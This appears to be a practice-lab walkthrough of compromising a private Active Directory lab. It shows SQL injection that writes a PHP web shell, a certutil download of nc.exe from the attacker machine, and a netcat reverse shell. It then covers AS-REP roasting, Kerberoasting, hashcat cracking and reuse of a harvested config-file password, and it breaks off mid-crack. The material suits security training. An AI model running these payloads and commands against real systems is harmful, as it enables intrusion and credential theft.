1. Download Kali, Extract the ZIP File, and Open it in VMWare
a. Download Kali for VMWare: https://www.kali.org/get-kali/#kali-virtual-machines
b. Extract the Kali Install Folder
c. After the Extraction is Complete, Open the Kali Image in VMWare
2. Set the VM Memory to 4096 MB
a. Right-click the VM in VMWare and click "Settings".
b. Changed the Memory to 4096 MB
3. Set the First Network Adapter to "Custom (VMnet1)" and the second Network Adapter to NAT
a. Select "Network Adapter" in VMWare Settings and select "Custom (VMnet1)" under "Network connection"
b. Clicked "Add", "Network Adapter", and "Finish", to add a NAT Adapter.
c. Clicked "OK" to exit "Virtual Machine Settings"
d. Started the VM
4. Configured Kali Networking
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.10.14.10
netmask 255.255.255.0
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/NetworkManager/NetworkManager.conf
[main]
plugins=ifupdown,keyfile
dns=dnsmasq
[ifupdown]
managed=false
┌──(kali㉿kali)-[~]
└─$ sudo mkdir -p /etc/NetworkManager/dnsmasq.d
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/NetworkManager/dnsmasq.d/lab.conf
server=/ad.lab/10.10.14.1
┌──(kali㉿kali)-[~]
└─$ sudo systemctl restart NetworkManager
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 127.0.0.1
options edns0 trust-ad
┌──(kali㉿kali)-[~]
└─$ shutdown -r now5. Confirmed DNS Resolution (Internal + External)
┌──(kali㉿kali)-[~]
└─$ nslookup ad.lab
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: ad.lab
Address: 10.10.14.1
Name: ad.lab
Address: 192.168.2.143
┌──(kali㉿kali)-[~]
└─$ nslookup google.com
Server: 127.0.0.1
Address: 127.0.0.1#53
Non-authoritative answer:
Name: google.com
Address: 192.0.0.88
6. Mapped Internal Lab Hosts in /etc/hosts
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.14.20 web01.ad.lab
10.10.14.40 web02.ad.lab
10.10.14.60 dmz01.ad.lab
10.10.14.80 mail01.ad.lab
10.10.14.100 dev01.ad.lab
10.10.14.120 admin04.ad.lab
10.10.14.140 admin03.ad.lab
10.10.14.160 admin02.ad.lab
10.10.14.180 admin01.ad.lab
10.10.14.200 files01.ad.lab
7. Confirmed Kerberos and LDAP Connection to the Domain Controller
┌──(kali㉿kali)-[~]
└─$ nc -zv 10.10.14.1 88
10.10.14.1: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.14.1] 88 (kerberos) open
┌──(kali㉿kali)-[~]
└─$ openssl s_client -connect 10.10.14.1:636 -showcerts
Connecting to 10.10.14.1
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN=dc01.ad.lab
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN=dc01.ad.lab
verify return:1
---
Certificate chain
0 s:CN=dc01.ad.lab
i:CN=dc01.ad.lab
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA1
v:NotBefore: Jan 11 04:53:00 2025 GMT; NotAfter: Jan 11 05:13:00 2026 GMT
-----BEGIN CERTIFICATE-----
MIIDHjCCAgagAwIBAgIQdr7jtkfuv7hMjeNAUbDx4TANBgkqhkiG9w0BAQUFADAW
MRQwEgYDVQQDDAtkYzAxLmFkLmxhYjAeFw0yNTAxMTEwNDUzMDBaFw0yNjAxMTEw
NTEzMDBaMBYxFDASBgNVBAMMC2RjMDEuYWQubGFiMIIBIjANBgkqhkiG9w0BAQEF
AAOCAQ8AMIIBCgKCAQEA6EMcrpWhyhUk2qNE5pxxo6zE0luzVfuUqK/p6blRRU2T
vFiFexlawAsajm6TWtj6gqNLrxmmU0D6KGKjcjWpYjyeXqFvIeJgCgVhzfpKVTmf
ByjzPLiJ6o+EcPmqEC1Fkim5x4bTL9MnGD5OVRCxlbNyLE/7y9G3o1fiqfvsv2cu
OkK4n9PJ9U0nw/M2XD1+EKf/KICD5j4tKpH2VSiWQjs1GcORV6T1wq6fVXXP0Wg9
ALYJCwd/kStgcbZEFZNUvR53RpakCCZs71a8hxKwK1vT3T+uCgUJ5QpnZC5V/YBt
g5D5FUiWC6vkwLKJxMjWjq/OfxIzEBjtK1e86dyAWQIDAQABo2gwZjAOBgNVHQ8B
Af8EBAMCBaAwFgYDVR0RBA8wDYILZGMwMS5hZC5sYWIwHQYDVR0lBBYwFAYIKwYB
BQUHAwEGCCsGAQUFBwMCMB0GA1UdDgQWBBTwtFAlr2t1mDqiLclhaUgQu5PPSjAN
BgkqhkiG9w0BAQUFAAOCAQEAklNOlSxZAXLbg8NgrYuRgCThEhYDrRuoJ8EwFEWC
YzVSLKpuh/hPZ5XLg5hUQTb6emz2k2Ws0nec3YWEPaDmy33MobefW8TDHfkqLXwu
MRq3jpYLvpEYrIrM+hQBzpKlrl7fjQJEL7E/cW58Aehql6k/e3rqKYDVPvyJdVcV
8jfE1eSpAc7Af2EQjWS5O17qgeG6g3b0mOB009Ba6NWsgF/BMGPJyQsxtpSN22/c
xGEJ3CidmxmFxzcxVRnR8nSAtHR01qdG8RNW77TL2jwNdeV1JmY355AHuT6xcjZD
WYW3lnCpx9dbuD0FItxjbR6CWSx4Qrn1k15whYpA8EzbWg==
-----END CERTIFICATE-----
---
Server certificate
subject=CN=dc01.ad.lab
issuer=CN=dc01.ad.lab
---
No client certificate CA names sent
Requested Signature Algorithms: RSA-PSS+SHA256:RSA-PSS+SHA384:RSA-PSS+SHA512:RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512
Shared Requested Signature Algorithms: RSA-PSS+SHA256:RSA-PSS+SHA384:RSA-PSS+SHA512:RSA+SHA256:RSA+SHA384:ECDSA+SHA256:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1329 bytes and written 548 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 7484492FF13316A68B71754CE967E0A042E2BE79E1C5C90F62076486DB92A2AC
Session-ID-ctx:
Resumption PSK: 0B4240C446C99950107DABE57E8ED4B95D2B8BBE844B4239348239E9D3DF23F9ABA70416564C9F030C7DE08FD2A809D5
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 36000 (seconds)
TLS session ticket:
0000 - 13 46 00 00 a2 eb 47 76-f0 e7 66 95 31 6d 18 93 .F....Gv..f.1m..
0010 - 93 8a 04 b7 cd dc b5 8e-85 f5 5b 4d d1 53 36 83 ..........[M.S6.
Start Time: 1736813116
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
1. Found an Apache Web Application on WEB01
┌──(kali㉿kali)-[~]
└─$ nmap -p 80 -sVC 10.10.14.20
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-15 17:27 EST
Nmap scan report for 10.10.14.20
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
MAC Address: 00:0C:29:47:BE:38 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.34 seconds
2. Enumerated the Web Application
┌──(kali㉿kali)-[~]
└─$ whatweb http://10.10.14.20/index.html
http://10.10.14.20/index.html [200 OK] Apache[2.4.58], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], IP[10.10.14.20], OpenSSL[3.1.3], PHP[8.2.12], PasswordField[password], Title[Vulnerable Login]3. Visually Inspected the Web Page
┌──(kali㉿kali)-[~]
└─$ firefox http://10.10.14.20/index.html4. Injected a Web Shell via the "Username" Field
a. Injected this PHP code into the "Username" field:
' UNION SELECT 1,";,3 INTO OUTFILE 'C:/xampp/htdocs/shell.php' #
b. Then entered a random value for the password and clicked "Login"
Browser Response:
Warning: Attempt to read property "num_rows" on bool in C:\xampp\htdocs\index.php on line 31
Invalid username or password.5. Verified the Web Shell Installation
┌──(kali㉿kali)-[~]
└─$ curl http://10.10.14.20/shell.php?cmd=whoami
1 ad\aaron
36. Injected PHP code to Download nc.exe
a. Clicked a back button in Firefox and injected this PHP code into the "Username" field:
' UNION SELECT 1,"<?php system('certutil -urlcache -f http://10.10.14.10:8000/nc.exe C:/xampp/htdocs/nc.exe'); ?>",3 INTO OUTFILE 'C:/xampp/htdocs/download_nc.php' #
b. Then entered a random value for the password and clicked "Login"
Browser Response:
Warning: Attempt to read property "num_rows" on bool in C:\xampp\htdocs\index.php on line 31
Invalid username or password.7. Copied nc.exe to the current working directory
┌──(kali㉿kali)-[~]
└─$ find / -name nc.exe -type f 2>/dev/null
/usr/share/windows-resources/binaries/nc.exe
┌──(kali㉿kali)-[~]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
8. Started a Python3 HTTP Server to Serve nc.exe
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
9. Executed the PHP File to Download nc.exe from Kali
┌──(kali㉿kali)-[~]
└─$ curl http://10.10.14.20/download_nc.php
1 **** Online ****
CertUtil: -URLCache command completed successfully.
310. Triggered the Reverse Shell
┌──(kali㉿kali)-[~]
└─$ curl "http://10.10.14.20/shell.php?cmd=C:\xampp\htdocs\nc.exe%2010.10.14.10%204444%20-e%20cmd.exe"11. Spawned a Reverse Shell as Aaron
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.20] 49858
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>whoami
whoami
ad\aaron
12. Enumerated Domain Users
C:\xampp\htdocs> net users /domain
net users /domain
The request will be processed at a domain controller for domain AD.LAB.
User accounts for \\DC01.AD.LAB
-------------------------------------------------------------------------------
Aaron Administrator Betty
Chris Daniela Ernesto
Francesca Gregory Guest
Helen iis_service Issac
Jamie krbtgt
The command completed successfully.13. Created a file named “users.txt” for use in the AS-REP roasting process.
┌──(kali㉿kali)-[~]
└─$ echo -e "Aaron\nAdministrator\nBetty\nChris\nDaniela\nErnesto\nFrancesca\nGregory\nGuest\nHelen\niis_service\nIssac\nJamie" > users.txt14. Executed AS-REP roasting against the domain “ad.lab” for user “ernesto” to extract the Kerberos AS-REP hash.
┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers ad.lab/ -no-pass -usersfile users.txt -dc-ip 10.10.14.1 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Aaron doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Betty doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Chris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Daniela doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$Ernesto@AD.LAB:27a8986e6cf261aac13722f4559a6b30$39dbdfcc6086e04997697426bebd12264a5be679ee3378962c8e699984a5bdfda397239eb1396789815028e79237ec10061ffa693b7bca24577c2e1e90ba6e43dd938c6bd09a42329bf45876a6b0e3a10c534b4d5e986d120059f80c52112c9efe5621a2f997ce0140a415024b283122391d04fb3c161e29a6cfbb32d32e9d73640a3d01c2c4f60748a1bca89f5edca0805ffca2e1926c7504988303bbd256a6ec929b6350bfe7b8f64337cd0166ab42dd586fbbfcea52cfa60cedd59926861b0d74c6f8ee9230b088d5baa9a41b765d0b65b3145e16b38a9fa72c7cd5c800621060590024088e28d94e89ee17fc991a
[-] User Francesca doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gregory doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
[-] User Helen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User iis_service doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Issac doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jamie doesn't have UF_DONT_REQUIRE_PREAUTH set
15. Unzipped the rockyou.txt.gz wordlist
┌──(kali㉿kali)-[~]
└─$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz
16. Used Hashcat to crack the extracted AS-REP hash with the RockYou wordlist, revealing the password “lucky#1”
┌──(kali㉿kali)-[~]
└─$ sudo hashcat -m 18200 '$krb5asrep$23$ernesto@AD.LAB:12583a96f33e9dc7dcb271771d13a9b9$63075b3af86cb8e9b2903b1a00a7d552ced69220b536d7e8b03e3787b5fa9def42594c14f5368c45256a199d961d611df00d16e6feb5d760fd808da61f5803c66ff0f0dd3749d729fe48ba7681f1c206c40381f823b7b58b74816f6d1fb8ca0450dc7f7412da762f8c5ef27018dfaf8b5eb8101d946665884eb44df9c0ae57ae429aabb103ce6510b76f4464d8ce6aede1ac361134771ab8551f31fb577959fdde9c2f793604b50dd5c81867fcd1354160fd9d63ab3d606c0404e8de41b6e2408b997ddbbaf5be161f72903c87605e9bb48bb0e22b9fb1863086b6cda80ed8404c93c440e325414c4ae8dc4fd881165d' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
[sudo] password for kali:
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344397
* Bytes.....: 139921596
* Keyspace..: 14344390
* Runtime...: 1 sec
$krb5asrep$23$ernesto@AD.LAB:12583a96f33e9dc7dcb271771d13a9b9$63075b3af86cb8e9b2903b1a00a7d552ced69220b536d7e8b03e3787b5fa9def42594c14f5368c45256a199d961d611df00d16e6feb5d760fd808da61f5803c66ff0f0dd3749d729fe48ba7681f1c206c40381f823b7b58b74816f6d1fb8ca0450dc7f7412da762f8c5ef27018dfaf8b5eb8101d946665884eb44df9c0ae57ae429aabb103ce6510b76f4464d8ce6aede1ac361134771ab8551f31fb577959fdde9c2f793604b50dd5c81867fcd1354160fd9d63ab3d606c0404e8de41b6e2408b997ddbbaf5be161f72903c87605e9bb48bb0e22b9fb1863086b6cda80ed8404c93c440e325414c4ae8dc4fd881165d:lucky#1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$ernesto@AD.LAB:12583a96f33e9dc7dcb271...81165d
Time.Started.....: Fri Feb 7 00:43:47 2025 (0 secs)
Time.Estimated...: Fri Feb 7 00:43:47 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1787.0 kH/s (0.83ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 112640/14344390 (0.79%)
Rejected.........: 0/112640 (0.00%)
Restore.Point....: 110592/14344390 (0.77%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: mutulica -> chancey1
Hardware.Mon.#1..: Util: 36%
Started: Fri Feb 7 00:43:46 2025
Stopped: Fri Feb 7 00:43:48 2025
17. Found a password hardcoded in the phpMyAdmin configuration file
C:\xampp\htdocs> type C:\xampp\phpMyAdmin\config.inc.php | findstr "'password'"
type C:\xampp\phpMyAdmin\config.inc.php | findstr "'password'"
$cfg['Servers'][$i]['password'] = 'tt.r.2006';18. Enumerated Logged-On Domain Users
C:\xampp\htdocs> dir C:\Users\
dir C:\Users\
Volume in drive C has no label.
Volume Serial Number is D637-439E
Directory of C:\Users
02/14/2025 08:38 PM DIR .
02/14/2025 08:38 PM DIR aaron
02/14/2025 01:25 PM DIR LocalUser
02/14/2025 01:23 PM DIR Public
0 File(s) 0 bytes
6 Dir(s) 42,891,587,584 bytes free
19. Installed Kerberos packages and configured the AD.LAB realm settings to enable Kerberos communication with the domain controller.
┌──(kali㉿kali)-[~]
└─$ sudo apt install -y krb5-user libkrb5-dev libsasl2-modules-gssapi-mit
krb5-user is already the newest version (1.21.3-4).
libkrb5-dev is already the newest version (1.21.3-4).
libkrb5-dev set to manually installed.
The following packages were automatically installed and are no longer required:
firebird3.0-common libgtksourceview-3.0-common
firebird3.0-common-doc libgtksourceviewmm-3.0-0v5
libbfio1 libhdf5-103-1t64
libc++1-19 libhdf5-hl-100t64
libc++abi1-19 libjxl0.9
libcapstone4 libmbedcrypto7t64
libconfig++9v5 libpaper1
libconfig9 libpoppler140
libdirectfb-1.7-7t64 libsuperlu6
libegl-dev libtag1v5
libfmt9 libtag1v5-vanilla
libgdal35 libtagc0
libgl1-mesa-dev libunwind-19
libgles-dev libwebrtc-audio-processing1
libgles1 libx265-209
libglvnd-core-dev openjdk-23-jre
libglvnd-dev openjdk-23-jre-headless
libgtksourceview-3.0-1 python3-appdirs
Use 'sudo apt autoremove' to remove them.
Installing:
libsasl2-modules-gssapi-mit
Summary:
Upgrading: 0, Installing: 1, Removing: 0, Not Upgrading: 37
Download size: 32.5 kB
Space needed: 124 kB / 62.2 GB available
Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules-gssapi-mit amd64 2.1.28+dfsg1-8+b1 [32.5 kB]
Fetched 32.5 kB in 1s (32.2 kB/s)
Selecting previously unselected package libsasl2-modules-gssapi-mit:amd64.
(Reading database ... 413314 files and directories currently installed.)
Preparing to unpack .../libsasl2-modules-gssapi-mit_2.1.28+dfsg1-8+b1_amd64.deb ...
Unpacking libsasl2-modules-gssapi-mit:amd64 (2.1.28+dfsg1-8+b1) ...
Setting up libsasl2-modules-gssapi-mit:amd64 (2.1.28+dfsg1-8+b1) ...
Inputs during Installation:
Default Kerberos version 5 realm: AD.LAB
Kerberos servers for your realm: 10.10.14.1
Administrator server for your Kerberos realm: DC01.AD.LAB20. Reused the password to request a Kerberos Ticket Granting Ticket (TGT) for ad\aaron
┌──(kali㉿kali)-[~]
└─$ kinit aaron
Password for aaron@AD.LAB: tt.r.200621. Verified the Kerberos Ticket Cache
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: aaron@AD.LAB
Valid starting Expires Service principal
02/07/2025 05:06:52 02/07/2025 15:06:52 krbtgt/AD.LAB@AD.LAB
renew until 02/08/2025 05:06:4422. Exported the Kerberos Ticket as an Environmental Variable
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=/tmp/krb5cc_100023. Used Aaron's Kerberos Ticket to Perform Kerberoasting against the Domain Controller
┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs -request -k -dc-ip 10.10.14.1 ad.lab/aaron -debug -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Getting machine hostname
[+] Connecting to 10.10.14.1, port 389, SSL False
[+] Using Kerberos Cache: /tmp/krb5cc_1000
[+] SPN LDAP/DC01.AD.LAB@AD.LAB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/AD.LAB@AD.LAB
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.14.1:88
[+] Connecting to 10.10.14.1, port 636, SSL True
[+] Using Kerberos Cache: /tmp/krb5cc_1000
[+] SPN LDAP/DC01.AD.LAB@AD.LAB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/AD.LAB@AD.LAB
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.14.1:88
[+] Total of records returned 4
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ----------- -------- -------------------------- --------------------------
HTTP/web02.ad.lab iis_service 2025-02-07 00:29:12.423410 2025-02-07 00:30:48.187474
[+] Using Kerberos Cache: /tmp/krb5cc_1000
[+] Returning cached credential for KRBTGT/AD.LAB@AD.LAB
[+] Using TGT from cache
[+] Username retrieved from CCache: aaron
[+] Trying to connect to KDC at 10.10.14.1:88
$krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*$e5bc8efac93e25d95774768cc0205fad$d5a45703e272ace010bc318ee6105be728adf86b2245ef21020172a8d254f226921a6df938e9ed3592c148408f27e7f806874494922c26399e14abe060b1678203992bc67abfab5186bd639256bcd703b233abab8f43a90df20a0a965c497f10a51e0ea5d3e0617d79b83e3347f9d53aca56cee8f260bae936d8df9302b51be5e82d0385504cd025f213b2befd54d805e73559ca27cc7eb405845fcb911f9efec8c09a1d72663e5385e09f4bc5af67efcf568aff5580f71660ac3cfe4ee0fd8381777c83900838a8dbf48ca649302aae3098f5349859bf4c6e7b12eaf78824d5fa7620a9bedb3d4eccd8b9e152c18b123c38fae001669dfb7f7face1e782e3e2c19d4e750f37584598f803aec470954d691d5e02664812a9ec3b1613d830a49fff5786eb9ca4109cf1e63832f1d846d359a31f3771a7672e8703da296414ccbc84dcfb2b57ce8e062554dbb5c657137c10faabbe57db1ef944f4cd5b00bb7fcdf5925b4e5e4812268121cdcd2cd53da578bec0eb1e82e1bc2e25b08542f086f937d20778942942d6f54964c759a38b675a8d2b50aa36c4d3b976c005452e536d4c67fc6f4aa79ac138b477de7361e6c3b974f1ed5a31a9e4409ee3157d667d9e0286f17e40efdff4be7d31c98f43e1315d24bdb31e5c1d9fa5f5638e94b52a4c76d0dce5f3fdf9cc0a893605e0f8adf1c774ade0060c4a10e60db2a0ab0587e898b9026d01dfeb2e23e7e4679d38f0dfd97abed82ed1f6ec413266b58cf58026dddeec224a38f8de9ea0ce1505ea75808958e4748a7591b1845e860b832ec56677c76242296e0dc943061f28ffab30ed8fe231ce19cee188c65b48d7b59dc379878984443c1c663f3297601deaea805889e8a6c084ca4755139693a7ffca8dedb881380df6da5e770362dcefca16d993b9e049cbb38dbdb9ab34621d15616c0f3cd1d76f7b2bcdb4b23749428c73aa15713ed24fb38c3f8fd1c22101f154c5e799fafbf840ab09ff81502b2184c6a63be186ba63fe439cefbab09d3c3f961c8c59d4f0c164c3ac57045d7e1f03e54088b4501588e6c1716874351d931ac5f901932c4f0c979db8fa775df36c977633b5f4a5b77737ef2909ee10ea47aef6f2c9f804fec09e572ce4644a6ff52ef1542d4f87a29243937ef6da241237e79b4ae3ec4fc017999eb112b5c498385d001533bf4fc8db8163d9ad7bed7aa67d1da9a6b860432442a982ea16afa48ae67ff7567bffded92bd9d0be843b8dbaae1b4cd3f7ccc78becc030139e27ccf94f7b97161a727cc8a5db6487621d9decd91ab02b907cefbfedafcd301010db626e4c6913ae1915b81b49dceda9fc22de4c3f8c9c389a4ff3e4c07b26ca7e3ba64d3e01cc1119a911ed6e66d66de0f522
24. Cracked iis_service Kerberoasted Hash, revealing the password "daisy_3"
┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 '$krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*$e5bc8efac93e25d95774768cc0205fad$d5a45703e272ace010bc318ee6105be728adf86b2245ef21020172a8d254f226921a6df938e9ed3592c148408f27e7f806874494922c26399e14abe060b1678203992bc67abfab5186bd639256bcd703b233abab8f43a90df20a0a965c497f10a51e0ea5d3e0617d79b83e3347f9d53aca56cee8f260bae936d8df9302b51be5e82d0385504cd025f213b2befd54d805e73559ca27cc7eb405845fcb911f9efec8c09a1d72663e5385e09f4bc5af67efcf568aff5580f71660ac3cfe4ee0fd8381777c83900838a8dbf48ca649302aae3098f5349859bf4c6e7b12eaf78824d5fa7620a9bedb3d4eccd8b9e152c18b123c38fae001669dfb7f7face1e782e3e2c19d4e750f37584598f803aec470954d691d5e02664812a9ec3b1613d830a49fff5786eb9ca4109cf1e63832f1d846d359a31f3771a7672e8703da296414ccbc84dcfb2b57ce8e062554dbb5c657137c10faabbe57db1ef944f4cd5b00bb7fcdf5925b4e5e4812268121cdcd2cd53da578bec0eb1e82e1bc2e25b08542f086f937d20778942942d6f54964c759a38b675a8d2b50aa36c4d3b976c005452e536d4c67fc6f4aa79ac138b477de7361e6c3b974f1ed5a31a9e4409ee3157d667d9e0286f17e40efdff4be7d31c98f43e1315d24bdb31e5c1d9fa5f5638e94b52a4c76d0dce5f3fdf9cc0a893605e0f8adf1c774ade0060c4a10e60db2a0ab0587e898b9026d01dfeb2e23e7e4679d38f0dfd97abed82ed1f6ec413266b58cf58026dddeec224a38f8de9ea0ce1505ea75808958e4748a7591b1845e860b832ec56677c76242296e0dc943061f28ffab30ed8fe231ce19cee188c65b48d7b59dc379878984443c1c663f3297601deaea805889e8a6c084ca4755139693a7ffca8dedb881380df6da5e770362dcefca16d993b9e049cbb38dbdb9ab34621d15616c0f3cd1d76f7b2bcdb4b23749428c73aa15713ed24fb38c3f8fd1c22101f154c5e799fafbf840ab09ff81502b2184c6a63be186ba63fe439cefbab09d3c3f961c8c59d4f0c164c3ac57045d7e1f03e54088b4501588e6c1716874351d931ac5f901932c4f0c979db8fa775df36c977633b5f4a5b77737ef2909ee10ea47aef6f2c9f804fec09e572ce4644a6ff52ef1542d4f87a29243937ef6da241237e79b4ae3ec4fc017999eb112b5c498385d001533bf4fc8db8163d9ad7bed7aa67d1da9a6b860432442a982ea16afa48ae67ff7567bffded92bd9d0be843b8dbaae1b4cd3f7ccc78becc030139e27ccf94f7b97161a727cc8a5db6487621d9decd91ab02b907cefbfedafcd301010db626e4c6913ae1915b81b49dceda9fc22de4c3f8c9c389a4ff3e4c07b26ca7e3ba64d3e01cc1119a911ed6e66d66de0f522' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344390
* Bytes.....: 139921596
* Keyspace..: 14344390
